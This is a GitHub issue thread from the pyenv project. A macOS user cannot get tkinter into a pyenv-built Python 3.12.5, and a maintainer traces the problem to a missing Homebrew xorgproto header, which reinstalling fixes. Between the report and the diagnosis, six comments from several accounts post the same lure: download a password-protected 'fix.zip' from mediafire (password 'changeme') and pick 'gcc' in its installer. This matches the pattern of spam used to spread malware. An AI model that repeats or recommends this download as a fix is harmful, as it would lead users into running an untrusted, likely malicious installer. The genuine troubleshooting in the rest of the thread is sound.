### ISSUE TITLE
Unable to include tkinter in python 3.12.5 (or 3.11.9) on MacOS Sonoma

### ISSUE THREAD

**Issue by mgab** [pyenv/pyenv#3041]
Too many issues will kill our team's development velocity, drastically.
Make sure you have checked all steps below.

### Prerequisite
* [x] Make sure your problem is not listed in [the common build problems](https://github.com/pyenv/pyenv/wiki/Common-build-problems).
* [x] Make sure no duplicated issue has already been reported in [the pyenv issues](https://github.com/pyenv/pyenv/issues). You should look for closed issues, too.
* [x] Make sure you are not asking us to help solving your specific issue.
  * GitHub issues is opened mainly for development purposes. If you want to ask someone to help solving your problem, go to some community site like [Gitter](https://gitter.im/yyuu/pyenv), [StackOverflow](https://stackoverflow.com/questions/tagged/pyenv), etc.
* [x] Make sure your problem is not derived from packaging (e.g. [Homebrew](https://brew.sh)).
  * Please refer to the package documentation for the installation issues, etc.
* [x] Make sure your problem is not derived from plugins.
  * This repository is maintaining `pyenv` and the default `python-build` plugin only. Please refrain from reporting issues of other plugins here.

### Description
- [x] Platform information (e.g. Ubuntu Linux 16.04): Mac OS Sonoma 14.6.1
- [x] OS architecture (e.g. amd64): arm64
- [x] pyenv version: 2.4.10
- [x] Python version: 3.12.5
- [x] C Compiler information (e.g. gcc 7.3): Apple clang version 15.0.0 (clang-1500.3.9.4)
- ~[ ] Please attach the debug trace of the failing command as a gist:~
  * ~Run `env PYENV_DEBUG=1 <faulty command> 2>&1 | tee trace.log` and attach `trace.log`. E.g. if you have a problem with installing Python, run `env PYENV_DEBUG=1 pyenv install -v <version> 2>&1 | tee trace.log` (note the `-v` option to `pyenv install`).~
- ~[ ] If you have a problem with installing Python, please also attach `config.log` from the build directory~
  * ~The build directory is reported after the "BUILD FAILED" message and is usually under `/tmp`.~
- [x] If the build succeeds but the problem is still with the build process (e.g. the resulting Python is missing a feature), please attach
  * the debug trace from reinstalling the faulty version with `env PYENV_DEBUG=1 pyenv install -f -k -v <version> 2>&1 | tee trace.log`
  * `config.log` from the build directory. When using `pyenv install` with `-k` as per above, the build directory will be under `$PYENV_ROOT/sources`.

[trace.log](https://github.com/user-attachments/files/16748167/trace.log)
[config.log](https://github.com/user-attachments/files/16748172/config.log)

I can install python 3.12.5, but I cannot manage for it to have tkinter properly included.

```bash
❯ pyenv install 3.12.5
python-build: use openssl@3 from homebrew
python-build: use readline from homebrew
Installing Python-3.12.5...
python-build: use tcl-tk from homebrew
python-build: use readline from homebrew
python-build: use ncurses from homebrew
python-build: use zlib from xcode sdk
Installed Python-3.12.5 to /Users/m.gabalda/.pyenv/versions/3.12.5
❯ pyenv shell 3.12.5
❯ python -m tkinter -c "tkinter._test()"
Traceback (most recent call last):
  File "<frozen runpy>", line 189, in _run_module_as_main
  File "<frozen runpy>", line 148, in _get_module_details
  File "<frozen runpy>", line 112, in _get_module_details
  File "/Users/m.gabalda/.pyenv/versions/3.12.5/lib/python3.12/tkinter/__init__.py", line 38, in <module>
    import _tkinter # If this fails your Python may not be configured for Tk
    ^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named '_tkinter'
```

I made sure that tcl-tk, along with other dependencies (`brew install openssl readline sqlite3 xz zlib tcl-tk pkg-config`), is installed with homebrew.

```bash
❯ brew info tcl-tk
==> tcl-tk: stable 8.6.14 (bottled)
Tool Command Language
https://www.tcl-lang.org
Conflicts with:
  page (because both install `page` binaries)
  the_platinum_searcher (because both install `pt` binaries)
Installed
/opt/homebrew/Cellar/tcl-tk/8.6.14 (3,065 files, 53.2MB) *
  Poured from bottle using the formulae.brew.sh API on 2024-08-25 at 16:57:05
From: https://github.com/Homebrew/homebrew-core/blob/HEAD/Formula/t/tcl-tk.rb
License: TCL
==> Dependencies
Required: openssl@3 ✔
==> Caveats
The sqlite3_analyzer binary is in the `sqlite-analyzer` formula.
==> Analytics
install: 24,063 (30 days), 79,232 (90 days), 413,429 (365 days)
install-on-request: 7,964 (30 days), 27,721 (90 days), 155,936 (365 days)
build-error: 24 (30 days)
```

And apparently correctly linked:
```bash
❯ ll /opt/homebrew/opt/tcl-tk
lrwxr-xr-x@ 1 m.gabalda  admin    23B 25 Aug 16:57 /opt/homebrew/opt/tcl-tk -> ../Cellar/tcl-tk/8.6.14
```

I also tried setting explicitly ENV variables, although apparently [this is not required any more for tkinter](https://stackoverflow.com/questions/60469202/unable-to-install-tkinter-with-pyenv-pythons-on-macos/75804235#75804235):

```bash
env LDFLAGS="-L$(brew --prefix openssl@1.1)/lib -L$(brew --prefix readline)/lib -L$(brew --prefix sqlite3)/lib -L$(brew --prefix xz)/lib -L$(brew --prefix zlib)/lib -L$(brew --prefix tcl-tk)/lib" \
CPPFLAGS="-I$(brew --prefix openssl@1.1)/include -I$(brew --prefix readline)/include -I$(brew --prefix sqlite3)/include -I$(brew --prefix xz)/include -I$(brew --prefix zlib)/include -I$(brew --prefix tcl-tk)/include" \
PKG_CONFIG_PATH="$(brew --prefix openssl@1.1)/lib/pkgconfig:$(brew --prefix readline)/lib/pkgconfig:$(brew --prefix sqlite3)/lib/pkgconfig:$(brew --prefix xz)/lib/pkgconfig:$(brew --prefix zlib)/lib/pkgconfig:$(brew --prefix tcl-tk)/lib/pkgconfig" \
pyenv install -v 3.12.5
```

In all cases the installation is completed, the installation logs warn about `_tkinter` not being found, and when trying to import `tkinter` I get the same `ModuleNotFoundError: No module named '_tkinter'` error. I also tried with python 3.11.9 (perhaps less exhaustively) with the same results.

It does not seem to be related to #2790. Similarly, there are many older issues and questions in stackoverflow that seem to be solved by installing `tcl-tk` with homebrew and by setting the environmental variables. Couldn't find more related issues.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by native-api** [comment]
Looks like the X server Homebrew package installation is broken

```
configure:15689: checking for tcl >= 8.5.12 tk >= 8.5.12
<...>
In file included from conftest.c:139:
In file included from /opt/homebrew/Cellar/tcl-tk/8.6.14/include/tcl-tk/tk.h:99:
/opt/homebrew/include/X11/Xlib.h:48:10: fatal error: 'X11/Xosdefs.h' file not found
#include <X11/Xosdefs.h>
         ^~~~~~~~~~~~~~~
1 error generated.
```

**Comment by native-api** [comment]
IIRC MacOS comes with its own Xlib, so I suspect that is a keg-only package that you've forcibly `bew link`ed.
https://github.com/pyenv/pyenv/wiki/Common-build-problems#keg-only-homebrew-packages-are-forcibly-linked--added-to-path

**Comment by mgab** [comment]
Thanks for the prompt response!! Yes, unlinking `libx11` with `brew unlink libx11` worked!

And apologies, I tried to investigate what I could to avoid filling an issue if it wasn't needed, but I guess I'm not familiar enough with gcc logs. Sorry for the noise 🙏

As for why it is linked, I'd say brew does it automatically. After unlinking it `ll /opt/homebrew/lib/X11` finds no file, but if then I run `brew reinstall libx11`, it goes back to being linked
```bash
❯ ll /opt/homebrew/lib/X11
lrwxr-xr-x@ 1 m.gabalda  admin    31B 27 Aug 12:59 /opt/homebrew/lib/X11 -> ../Cellar/libx11/1.8.10/lib/X11
```

I'm not familiar with the whole ecosystem. Is this something that should be reported to homebrew?

**Comment by native-api** [comment]
> As for why it is linked, I'd say brew does it automatically. After unlinking it `ll /opt/homebrew/lib/X11` finds no file, but if then I run `brew reinstall libx11`, it goes back to being linked

I've tested with libX11 installed, and it compiled for me fine. So it should not be breaking the build.
The problem was that the `/opt/homebrew/include/X11/Xosdefs.h` file is missing.
Homebrew shows that it belongs to the `xorgproto` Homebrew package:

```
% ls -l /opt/homebrew/include/X11/Xosdefs.h 
lrwxr-xr-x  1 admin  staff  51 Aug 28 07:46 /opt/homebrew/include/X11/Xosdefs.h -> ../../Cellar/xorgproto/2024.1/include/X11/Xosdefs.h

So reinstalling this package should allow you to build Python with libX11 installed.
```

**Comment by mgab** [comment]
You're right, reinstalling `xorgproto` fixes the behaviour. It looks I had an unlinked installation of `xorgproto`, although I surely don't remember messing up with it. Nevermind. 

Huge thanks for the responses and the support, and for the effort in the project in general! I'm closing the issue and stopping the noise here!
